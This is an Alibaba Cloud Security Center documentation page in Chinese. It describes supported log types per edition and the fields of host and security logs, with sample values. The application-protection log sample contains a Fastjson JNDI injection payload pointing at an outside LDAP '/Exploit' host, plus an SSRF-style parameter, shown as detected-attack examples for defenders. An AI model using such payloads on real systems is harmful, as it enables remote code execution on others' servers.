AI 助理
备案控制台
官方文档
输入文档关键字查找
首页 云安全中心 操作指南 风险治理 日志分析 日志类别及字段说明

日志类别及字段说明

更新时间:
产品详情
我的收藏

云安全中心的日志分析功能支持对主机活动和安全事件进行集中的存储、查询与分析,用于安全审计、事件溯源和威胁发现。内容包括云安全中心支持的日志类型、各版本功能差异、日志字段以及查询示例。

版本支持说明

包年包月

主机日志

日志分类

免费版

防病毒版

高级版

企业版

旗舰版

登录流水日志

不支持

支持

支持

支持

支持

网络连接日志

不支持

支持

支持

支持

支持

进程启动日志

不支持

支持

支持

支持

支持

暴力破解日志

不支持

支持

支持

支持

支持

DNS请求日志

不支持

支持

支持

支持

支持

客户端事件日志

支持

支持

支持

支持

支持

账号快照日志

不支持

不支持

不支持

支持

支持

网络快照日志

不支持

不支持

不支持

支持

支持

进程快照日志

不支持

不支持

不支持

支持

支持

安全日志

日志分类

免费版

防病毒版

高级版

企业版

旗舰版

安全告警日志

支持

说明

仅记录免费版支持的告警。

支持

支持

支持

支持

漏洞日志

支持

说明

仅记录免费版支持的漏洞。

支持

支持

支持

支持

网络防御日志

不支持

支持

支持

支持

支持

核心文件监控事件日志

不支持

不支持

不支持

支持

支持

云安全态势管理-基线检查

不支持

不支持

支持

支持

支持

增值服务日志

开通下列增值服务时,云安全中心支持分析其产生的日志。

  • 恶意文件检测

  • 无代理检测

  • 应用防护

  • 云安全态势管理基线检查日志、云产品配置检查日志)

按量付费服务

若购买了主机及容器安全后付费服务,根据服务器绑定的防护等级不同,支持的日志类型也不一样。

主机日志

日志分类

未防护

病毒防护

主机全面防护

主机及容器全面防护

登录流水日志

不支持

支持

支持

支持

网络连接日志

不支持

支持

支持

支持

进程启动日志

不支持

支持

支持

支持

暴力破解日志

不支持

支持

支持

支持

DNS请求日志

不支持

支持

支持

支持

客户端事件日志

支持

支持

支持

支持

账号快照日志

不支持

不支持

支持

支持

网络快照日志

不支持

不支持

支持

支持

进程快照日志

不支持

不支持

支持

支持

安全日志

日志分类

未防护

病毒防护

主机全面防护

主机及容器全面防护

安全告警日志

支持

说明

仅记录未防护等级支持的告警。

支持

支持

支持

漏洞日志

支持

说明

仅记录未防护等级支持的漏洞。

支持

支持

支持

网络防御日志

不支持

支持

支持

支持

核心文件监控事件日志

不支持

不支持

支持

支持

后付费服务日志

开通下列后付费服务时,云安全中心支持分析其产生的日志。

  • 恶意文件检测

  • 无代理检测

  • 应用防护

  • 云安全态势管理基线检查日志、云产品配置检查日志)

日志类型说明

说明

以下日志样例和字段说明仅为参考。具体字段可能因产品版本更新而发生变化,请以日志服务中实际采集到的数据为准。

主机日志

  • 登录流水日志

    • __topic__aegis-log-login

    • 日志内容:记录用户登录服务器的事件,包括登录源IP、用户名、结果等

    • 功能描述: 帮助监控用户的活动,及时识别和响应异常行为。

      重要

      云安全中心不支持采集 Windows Server 2008 操作系统的登录流水日志

    • 采集周期:实时采集。

  • 网络连接日志

    • __topic__aegis-log-network

    • 日志内容:实时记录服务器上的网络连接活动,包括连接五元组、关联进程等信息

    • 功能描述:帮助发现异常连接行为,识别潜在的网络攻击,优化网络性能等。

      重要

      • 服务器只收集网络连接从建立到结束过程中的部分状态。

      • 入向流量不记录。

    • 采集周期:实时采集。

  • 进程启动日志

    • __topic__aegis-log-process

    • 日志内容:记录服务器上所有新进程的启动事件,包含进程名、命令行参数、父进程等信息

    • 功能描述: 帮助了解系统中进程的启动情况和配置信息,检测异常进程活动、恶意软件入侵和安全威胁等问题。

    • 采集周期:实时采集,进程启动立刻上报。

  • 暴力破解日志

    • __topic__: aegis-log-crack

    • 日志内容: 记录暴力破解行为的日志,包括尝试登录及破解系统、应用程序或账号的信息。

    • 功能描述: 帮助识别暴力破解攻击,检测异常登录、弱密码和凭证泄露问题,并为事件响应与取证分析提供支持。

    • 采集周期: 实时采集。

  • 账号快照日志

    • __topic__: aegis-snapshot-host

    • 日志内容: 记录系统或应用程序中用户账号详细信息的日志,包括账号的基本属性,例如用户名、密码策略、登录历史等。

    • 功能描述: 通过对比不同时间点的快照,监测账号变更,及时发现未授权访问、账号状态异常等安全问题。

    • 采集周期: 按照资产指纹设置的周期自动采集,若未设置,则每日采集一次。同时支持手动采集。

  • 网络快照日志

    • __topic__: aegis-snapshot-port

    • 日志内容: 记录网络连接信息,包括连接五元组、连接状态及关联进程等。

    • 功能描述: 帮助了解系统当前活动的网络连接,发现异常连接行为,识别潜在网络攻击。

    • 采集周期: 按照资产指纹设置的周期自动采集,若未设置,则每日采集一次。同时支持手动采集。

  • 进程快照日志

    • __topic__: aegis-snapshot-process

    • 日志内容: 记录系统中的进程活动,包括进程ID、名称、启动时间等。

    • 功能描述: 用于了解进程活动与资源占用情况,检测异常进程、CPU占用过高及内存泄露等问题。

    • 采集周期: 按照资产指纹设置的周期自动采集,若未设置,则每日采集一次。同时支持手动采集。

  • DNS请求日志

    • __topic__: aegis-log-dns-query

    • 日志内容: 记录服务器发起的DNS查询请求,包含查询域名、类型和来源等信息。

      重要

      内核版本低于4.X.XLinux服务器不支持此日志采集。

    • 功能描述: 用于分析DNS活动,检测异常查询、域名劫持和DNS污染等问题。

    • 采集周期: 实时采集。

  • 客户端事件日志

    • __topic__: aegis-log-client

    • 日志内容: 记录云安全中心客户端的上线和离线事件。

    • 功能描述: 帮助监控安全客户端的运行状态。

    • 采集周期: 实时采集。

安全日志

重要

安全日志采集周期均为实时采集。

  • 漏洞日志

    • __topic__sas-vul-log

    • 日志内容:记录系统或应用中发现的漏洞信息,包含漏洞名称、状态、处理动作等。

    • 功能描述:用于了解系统存在的漏洞情况、安全风险和攻击趋势,以便及时采取补救措施。

  • 云安全态势管理-基线检查日志

    • __topic__sas-hc-log

    • 日志内容:记录基线风险检查结果,包含基线等级、类别、风险等级等信息。

      重要

      仅记录首次出现且未通过的检查项数据,以及历史检测中已通过但重新检测后未通过的检查项数据。

    • 功能描述:用于了解系统的基线安全状态和潜在风险。

  • 安全告警日志

    • __topic__sas-security-log

    • 日志内容:记录系统或应用中发生的安全事件与告警,包含告警数据源、详情、等级等。

    • 功能描述:用于了解系统中的安全事件与威胁情况,以便及时采取响应措施。

  • 云安全态势管理-云平台配置检查日志

    • __topic__sas-cspm-log

    • 日志内容:记录云平台配置检查结果、加白操作等信息。

    • 功能描述:用于了解云平台存在的配置问题和潜在的安全风险。

  • 网络防御日志

    • __topic__sas-net-block

    • 日志内容:记录网络攻击事件,包含攻击类型、源/目标IP地址等关键信息。

    • 功能描述:用于了解网络中发生的安全事件,以采取响应和防御措施,提升网络安全。

  • 应用防护日志

    • __topic__sas-rasp-log

    • 日志内容:记录应用防护(RASP)的攻击告警信息,包含攻击类型、行为数据、攻击者IP等。

    • 功能描述:用于了解应用程序发生的安全事件,以采取响应和防御措施,提升应用安全。

  • 恶意文件检测日志

    • __topic__sas-filedetect-log

    • 日志内容:记录恶意文件检测SDK的检测结果,包含文件信息、检测场景、结果等。

    • 功能描述:用于识别离线文件或云存储中的恶意程序,以便及时处理。

  • 核心文件监控事件日志

    • __topic__aegis-file-protect-log

    • 日志内容:记录核心文件监控检测到的告警事件,包含文件路径、操作类型、告警等级等。

    • 功能描述:用于监控核心文件是否被盗取或篡改。

  • 无代理检测日志

    • __topic__sas-agentless-log

    • 日志内容:记录在云服务器、云盘快照、镜像中检测到的安全风险,包括漏洞、基线、恶意样本、敏感文件。

    • 功能描述:用于查看资产在不同时间段的安全风险状况,以便识别和应对潜在威胁。

主机日志字段说明

登录流水日志

字段名

说明

示例

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器的IP地址。

192.168.XX.XX

sas_group_name

服务器在云安全中心的资产分组。

default

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

src_ip

登录服务器的IP地址。

221.11.XX.XX

dst_port

登录服务器的端口。

22

login_type

登录类型。取值包括但不限于:

  • SSHLOGINSSH:SSH登录。

  • RDPLOGIN:远程桌面登录。

  • IPCLOGIN:IPC连接登录。

SSH

username

登录用户名。

admin

login_count

登录次数。

1分钟内重复登录会被合并为1条日志,例如login_count值为3,表示在最近1分钟内重复登录了3次。

3

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

网络连接日志

字段名

说明

示例

cmd_chain

进程链。

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

进程链索引,可以通过相同索引查找进程链。

B184

container_hostname

容器内服务器名称。

nginx-ingress-controller-765f67fd4d-****

container_id

容器ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

镜像ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

镜像名称。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

容器名称。

nginx-ingress-****

container_pid

容器内进程ID。

0

net_connect_dir

网络连接方向。取值:

  • in:入方向。

  • out:出方向。

in

dst_ip

网络连接接收者的IP。

  • dirout时,表示对端主机。

  • dirin时,表示本机。

192.168.XX.XX

dst_port

网络连接接收者的端口。

443

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

parent_proc_name

父进程的文件名。

/usr/bin/bash

pid

进程ID。

14275

ppid

父进程ID。

14268

proc_name

进程名。

nginx

proc_path

进程路径。

/usr/local/nginx/sbin/nginx

proc_start_time

进程的启动时间。

N/A

connection_type

协议。取值:

  • tcp

  • raw(表示raw socket)。

tcp

sas_group_name

服务器在云安全中心的资产分组。

default

src_ip

IP地址。

100.127.XX.XX

src_port

源端口。

41897

srv_comm

父进程的父进程关联的命令名。

containerd-shim

status

网络连接状态。取值:

  • 1:连接已关闭(closed)。

  • 2:正在等待连接请求(listen)。

  • 3:已发送SYN请求(syn send)。

  • 4:已接收SYN请求(syn recv)。

  • 5:连接已建立(established)。

  • 6:等待关闭连接(close wait)。

  • 7:正在关闭连接(closing)。

  • 8:等待对方发送关闭请求(fin_wait1)。

  • 9:等待对方发送关闭请求并确认(fin_wait2)。

  • 10:等待足够的时间以确保对方收到关闭请求的确认(time_wait)。

  • 11:已删除传输控制块(delete_tcb)。

5

type

实时网络连接的类型。取值:

  • connect:主动发起TCP connect连接。

  • accept:收到TCP连接。

  • listen:端口监听。

listen

uid

进程用户的ID。

101

username

进程的用户名。

root

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

进程启动日志

字段名

说明

示例

cmd_chain

进程链。

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

进程链索引,可以通过相同索引查找进程链。

B184

cmd_index

命令行每个参数的索引,每两个为一组,标识一个参数的起止索引。

0,3,5,8

cmdline

进程启动的完整命令行。

ipset list KUBE-6-CLUSTER-IP

comm

进程关联的命令名。

N/A

container_hostname

容器内服务器名称。

nginx-ingress-controller-765f67fd4d-****

container_id

容器ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

镜像ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

镜像名称。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

容器名称。

nginx-ingress-****

container_pid

容器内进程ID。

0

cwd

进程运行目录。

N/A

proc_name

进程文件名。

ipset

proc_path

进程文件完整路径。

/usr/sbin/ipset

gid

进程组的ID。

0

groupname

用户组。

group1

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

parent_cmd_line

父进程的命令行。

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

父进程文件名。

kube-proxy

parent_proc_path

父进程文件完整路径。

/usr/local/bin/kube-proxy

pid

进程ID。

14275

ppid

父进程ID。

14268

proc_start_time

进程启动时间。

2024-08-01 16:45:40

parent_proc_start_time

父进程的启动时间。

2024-07-12 19:45:19

sas_group_name

服务器在云安全中心的资产分组。

default

srv_cmd

祖进程的命令行。

/usr/bin/containerd

tty

登录的终端。N/A表示账号从未登录过终端。

N/A

uid

用户ID。

123

username

进程的用户名。

root

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

暴力破解日志

字段名

说明

示例

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

被暴力破解的服务器IP地址。

192.168.XX.XX

sas_group_name

服务器在云安全中心的资产分组。

default

uuid

被暴力破解的服务器UUID。

5d83b26b-b7ca-4a0a-9267-12*****

login_count

失败登录次数。

1分钟内重复登录会被合并为1条日志,例如warn_count值为3,表示在最近1分钟内重复登录了3次。

3

src_ip

登录来源IP地址。

47.92.XX.XX

dst_port

登录端口。

22

login_type

登录类型。取值:

  • SSHLOGINSSH:SSH登录。

  • RDPLOGIN:远程桌面登录。

  • IPCLOGIN:IPC连接登录。

  • SQLSERVER:sqlserver登录失败。

SSH

username

登录用户名。

user

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

账号快照日志

字段名

说明

示例

account_expire

账号的过期时间。never表示永不过期。

never

domain

账号所在的域或目录服务。N/A表示不属于任何域。

N/A

groups

账号所在的分组。N/A表示不属于任何组。

["nscd"]

home_dir

主目录,系统中存储和管理文件的默认位置。

/Users/abc

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

last_chg

最后一次修改密码的日期。

2022-11-29

last_logon

最后一次登录账号的日期和时间。N/A表示从未登录过。

2023-08-18 09:21:21

login_ip

最后一次登录账号的远程IP地址。N/A表示从未登录过。

192.168.XX.XX

passwd_expire

密码的过期日期。never表示永不过期。

2024-08-24

perm

是否拥有root权限。取值:

  • 0:没有root权限。

  • 1:有root权限。

0

sas_group_name

服务器在云安全中心的资产分组。

default

shell

LinuxShell命令。

/sbin/nologin

status

用户账号的状态,取值:

  • 0:账号已被禁止登录。

  • 1:账号可以正常登录。

0

tty

登录的终端。N/A表示账号从未登录过终端。

N/A

username

用户名称。

nscd

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

warn_time

密码到期提醒日期。never表示永不提醒。

2024-08-20

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

网络快照日志

字段名

说明

示例

net_connect_dir

网络连接方向。取值:

  • in:入方向。

  • out:出方向。

in

dst_ip

网络连接接收者的IP。

  • dirout时,表示对端主机。

  • dirin时,表示本机。

192.168.XX.XX

dst_port

网络连接接收者的端口。

443

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

pid

进程ID。

682

proc_name

进程名。

sshd

connection_type

协议。取值:

  • tcp4:用IPv4协议的TCP连接。

  • tcp6:用IPv6协议的TCP连接。

tcp4

sas_group_name

服务器在云安全中心的资产分组。

default

src_ip

IP地址。

100.127.XX.XX

src_port

源端口。

41897

status

网络连接状态。取值:

  • 1:连接已关闭(closed)。

  • 2:正在等待连接请求(listen)。

  • 3:已发送SYN请求(syn send)。

  • 4:已接收SYN请求(syn recv)。

  • 5:连接已建立(established)。

  • 6:等待关闭连接(close wait)。

  • 7:正在关闭连接(closing)。

  • 8:等待对方发送关闭请求(fin_wait1)。

  • 9:等待对方发送关闭请求并确认(fin_wait2)。

  • 10:等待足够的时间以确保对方收到关闭请求的确认(time_wait)。

  • 11:已删除传输控制块(delete_tcb)。

5

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

进程快照日志

字段名

说明

示例

cmdline

进程启动的完整命令行。

/usr/local/share/assist-daemon/assist_daemon

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

md5

二进制文件的MD5哈希值。

说明

超过1 MB的进程文件不进行MD5计算。

1086e731640751c9802c19a7f53a64f5

proc_name

进程文件名。

assist_daemon

proc_path

进程文件完整路径。

/usr/local/share/assist-daemon/assist_daemon

pid

进程ID。

1692

pname

父进程文件名。

systemd

sas_group_name

服务器在云安全中心的资产分组。

default

proc_start_time

进程启动时间。内置字段。

2023-08-18 20:00:12

uid

进程用户的ID。

101

username

进程的用户名。

root

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

DNS请求日志

字段名

说明

示例

domain

DNS请求对应的域名。

example.aliyundoc.com

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

发起DNS请求的服务器IP地址。

192.168.XX.XX

pid

发起DNS请求的进程ID。

3544

ppid

发起DNS请求的父进程ID。

3408

cmd_chain

发起DNS请求的进程链。

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

发起DNS请求的命令行。

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

发起DNS请求的进程路径。

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

服务器在云安全中心的资产分组。

default

time

捕获DNS请求事件的时间,该时间一般和DNS请求发生时间相同。

2023-08-17 20:05:04

uuid

发起DNS请求的服务器UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

客户端事件日志

字段名

说明

示例

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

host_ip

服务器IP地址。

192.168.XX.XX

agent_version

客户端版本。

aegis_11_91

last_login

上次登录的时间戳。单位:毫秒。

1716444387617

platform

操作系统类型。取值:

  • windows

  • linux

linux

region_id

服务器所在地域ID。

cn-beijing

status

客户端状态。取值:

  • online

  • offline

online

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

安全日志字段说明

漏洞日志

字段名

说明

示例

vul_alias_name

漏洞别名。

CESA-2023:1335: openssl Security Update

risk_level

风险等级。取值:

  • asap:高

  • later:中

  • nntf:低

later

extend_content

漏洞扩展信息。

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

资产的公网IP。

39.104.XX.XX

intranet_ip

资产的私网IP。

192.168.XX.XX

instance_name

主机名称。

hhht-linux-***

vul_name

漏洞名称。

centos:7:cesa-2023:1335

operation

漏洞的处理动作。取值:

  • new:新增。

  • verify:验证。

  • fix:修复。

new

status

状态信息。取值:

  • 1:未修复。

  • 2:修复失败。

  • 3:回滚失败。

  • 4:修复中。

  • 5:回滚中。

  • 6:验证中。

  • 7:修复成功。

  • 8:修复成功,待重启。

  • 9:回滚成功。

  • 10:忽略。

  • 11:回滚成功,待重启。

  • 12:已不存在。

  • 13:已失效。

1

tag

漏洞的标签。取值:

  • oval:Linux软件漏洞。

  • system:Windows系统漏洞。

  • cms:Web-CMS漏洞。

    说明

    其他类型的漏洞的标签为随机字符串。

oval

type

漏洞类型。取值:

  • sys:Windows系统漏洞。

  • cve:Linux软件漏洞。

  • cms:Web-CMS漏洞。

  • emg:紧急漏洞。

sys

uuid

服务器UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

云安全态势管理-基线检查日志

字段名

说明

示例

check_item_name

检查项名称。

设置密码修改最小间隔时间

check_item_level

基线的检查等级。取值:

  • high:高危。

  • medium:中危。

  • low:低危。

medium

check_type

检查项类型。

身份鉴别

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

risk_level

风险项级别。取值:

  • high:高。

  • medium:中。

  • low:低。

medium

operation

操作信息。取值:

  • new:新增。

  • verity:验证。

new

risk_name

风险项名称。

密码策略合规检测

sas_group_name

检测出当前风险项的服务器在云安全中心的资产分组。

default

status

状态信息。取值:

  • 1:未通过。

  • 2:验证中。

  • 6:已经忽略。

  • 7:修复中

1

sub_type_alias_name

子类型别名(中文)。

国际通用安全最佳实践-Ubuntu 16/18/20/22安全基线检查

sub_type_name

基线子类型名称。基线子类型取值请参见基线类型及子类型列表

hc_ubuntu16_cis_rules

type_alias_name

类型别名(中文)。

国际通用安全最佳实践

type_name

基线类型。基线类型取值请参见基线类型及子类型列表

cis

uuid

检测出当前风险项的服务器UUID。

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

安全告警日志

字段名

说明

示例

data_source

数据源。取值:

  • aegis_suspicious_event:主机异常。

  • aegis_suspicious_file_v2:Webshell。

  • aegis_login_log:异常登录。

  • honeypot:云蜜罐告警事件。

  • object_scan:文件检测异常事件。

  • security_event:云安全中心异常事件。

  • sas_ak_leak:AK泄露事件。

aegis_login_log

detail

一个结构化对象(JSON),用于提供告的详细上下文信息。其内部字段会根据告警类型的不同而变化。

以下是 detail 对象内常见字段 alert_reason (异常原因)说明:

  • reason1:IP不属于常用访问地点。

  • reason2:API调用失败。

  • reason3:IP不属于常用访问地点且API调用失败。

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"西安市","type":"login_common_account","displayEventName":"ECS非常用账号登录","status":0}

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

资产的公网IP。

39.104.XX.XX

intranet_ip

资产的私网IP。

192.168.XX.XX

level

告警事件的危险等级。取值:

  • serious:紧急。

  • suspicious:可疑。

  • remind:提醒。

suspicious

name

告警名称。

异常登录-ECS非常用账号登录

operation

操作信息。取值:

  • new:新增。

  • dealing:处理。

  • update:更新。

new

status

告警的状态。取值:

  • 1:待处理,新产生的告警为该状态。

  • 2:已忽略,在控制台执行忽略操作后的告警状态。

  • 8:已加入白名单,在控制台执行加白名单后的告警状态。

  • 16:处理中,在控制台执行结束进程、隔离文件或者加白名单等处理过程产生的状态。

  • 32:处理完成,在控制台执行我已手工处理,或执行结束进程、隔离文件等操作处理完成后的状态。

  • 64:已经过期,30天内告警未做任何处理就会置为过期状态。

  • 513:自动拦截,该告警已被云安全中心精准防御功能自动拦截,无需您手动处理。

1

unique_info

告警的唯一标识。

2536dd765f804916a1fa3b9516b5****

uuid

产生告警的服务器UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

suspicious_event_id

告警事件ID。

650226318

handle_time

operation对应的时间。

1765272845

alert_first_time

告警首次出现时间。

1764226915

alert_last_time

告警最后一次出现时间。

1765273425

strict_type

告警是否是严格模式的告警。取值范围:true/false。

user_id

账户ID。

1358******3357

云安全态势管理-云平台配置检查日志

字段名

说明

示例

check_id

检查项ID。可通过调用ListCheckResult - 查看云产品中云平台配置检查风险项结果详情接口获取ID值。

11

check_item_name

检查项名称。

回源配置

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

instance_name

实例名称。

lsm

instance_result

风险产生的影响。格式为JSON字符串。

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

实例的子类型。取值:

  • 当实例类型为ECS时,子类型的取值:

    • INSTANCE

    • DISK

    • SECURITY_GROUP

  • 当实例类型为ACR时,子类型的取值:

    • REPOSITORY_ENTERPRISE

    • REPOSITORY_PERSON

  • 当实例类型为RAM时,子类型的取值:

    • ALIAS

    • USER

    • POLICY

    • GROUP

  • 当实例类型为WAF时,子类型的取值为DOMAIN

  • 当实例类型为其他值时,子类型的取值为INSTANCE

INSTANCE

instance_type

实例类型。取值:

  • ECS:云服务器。

  • SLB:负载均衡。

  • RDS:RDS数据库。

  • MONGODB:MongoDB数据库。

  • KVSTORE:Redis数据库。

  • ACR:容器镜像服务。

  • CSK:CSK。

  • VPC:专有网络。

  • ACTIONTRAIL:操作审计。

  • CDN:内容分发网络。

  • CAS:数字证书管理服务(原SSL证书)。

  • RDC:云效。

  • RAM:访问控制。

  • DDOS:DDoS防护。

  • WAF:Web应用防火墙。

  • OSS:对象存储。

  • POLARDB:PolarDB数据库。

  • POSTGRESQL:PostgreSQL数据库。

  • MSE:微服务引擎。

  • NAS:文件存储。

  • SDDP:敏感数据保护。

  • EIP:弹性公网IP。

ECS

region_id

实例所在地域ID。

cn-hangzhou

requirement_id

条例ID。您可以通过ListCheckStandard - 云平台配置检查获取标准列表接口获取该ID。

5

risk_level

风险级别。取值:

  • LOW

  • MEDIUM

  • HIGH

MEDIUM

section_id

章节ID。您可以通过ListCheckResult - 查看云产品中云平台配置检查风险项结果详情接口获取ID值。

1

standard_id

标准ID。您可以通过ListCheckStandard - 云平台配置检查获取标准列表接口获取该ID。

1

status

检查项的状态。取值:

  • NOT_CHECK:未检查。

  • CHECKING:检查中。

  • PASS:检查通过。

  • NOT_PASS:检查未通过。

  • WHITELIST:已加入白名单。

PASS

vendor

所属云厂商。固定取值:ALIYUN。

ALIYUN

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

网络防御日志

字段名

说明

示例

cmd

被攻击的进程命令行。

nginx: master process nginx

cur_time

攻击事件的发生时间。

2023-09-14 09:21:59

decode_payload

HEX格式转换为字符的payload。

POST /Services/FileService/UserFiles/

dst_ip

被攻击资产的IP地址。

172.16.XX.XX

dst_port

被攻击资产的端口。

80

func

拦截事件的类型。取值:

  • payload:恶意负载类型,表示由于检测到恶意数据或指令而触发的攻击事件拦截。

  • tuple:恶意IP类型,表示由于检测到恶意IP访问而触发的攻击事件拦截。

payload

rule_type

拦截事件的具体规则类型。取值:

  • alinet_payload:云安全中心指定的payload事件防御规则。

  • alinet_tuple:云安全中心指定的tuple事件防御规则。

alinet_payload

instance_id

被攻击资产的实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

被攻击资产的公网IP。

39.104.XX.XX

intranet_ip

被攻击资产的私网IP。

192.168.XX.XX

final_action

防御动作模式。取值:block(已拦截)。

block

payload

HEX格式的payload。

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

被攻击的进程ID。

7107

platform

被攻击资产的系统类型。取值:

  • windows

  • linux

linux

proc_path

被攻击的进程路径。

/usr/sbin/nginx

sas_group_name

服务器在云安全中心的资产分组。

default

src_ip

发起攻击的源IP地址。

106.11.XX.XX

src_port

发起攻击的源端口。

29575

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

应用防护日志

字段名

说明

示例

app_dir

应用所在目录。

/usr/local/aegis/rasp/apps/1111

app_id

应用ID。

6492a391fc9b4e2aad94****

app_name

应用名称。

test

confidence_level

检测算法的置信度。取值:

  • high

  • medium

  • low

low

request_body

请求体信息。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

请求体长度。

112

data

hook点参数。

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

请求头信息。

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

主机或网络设备的名称。

testhostname

host_ip

主机私网IP地址。

172.16.XX.XX

is_cliped

该条日志是否因为超长被裁剪过。取值:

  • true:已裁剪

  • false:未裁剪

false

jdk_version

JDK版本。

1.8.0_292

message

告警描述信息。

Unsafe class serial.

request_method

请求方法。

Post

platform

操作系统类型。

Linux

arch

操作系统架构。

amd64

kernel_version

操作系统内核版本。

3.10.0-1160.59.1.el7.x86_64

param

请求参数,常见格式包括:

  • GET参数。

  • application/x-www-form-urlencoded。

{"url":["http://127.0.0.1.xip.io"]}

payload

有效攻击载荷。

bash -c kill -0 -- -'31098'

payload_length

有效攻击载荷长度。

27

rasp_id

应用防护探针唯一ID。

fa00223c8420e256c0c98ca0bd0d****

rasp_version

应用防护探针版本。

0.8.5

src_ip

请求者IP地址。

172.0.XX.XX

final_action

告警处理结果。取值:

  • block:防护,即阻断。

  • monitor:监控。

block

rule_action

规则指定的告警处理方式。取值:

  • block

  • monitor

block

risk_level

风险级别。取值:

  • high

  • medium

  • low

high

stacktrace

堆栈信息。

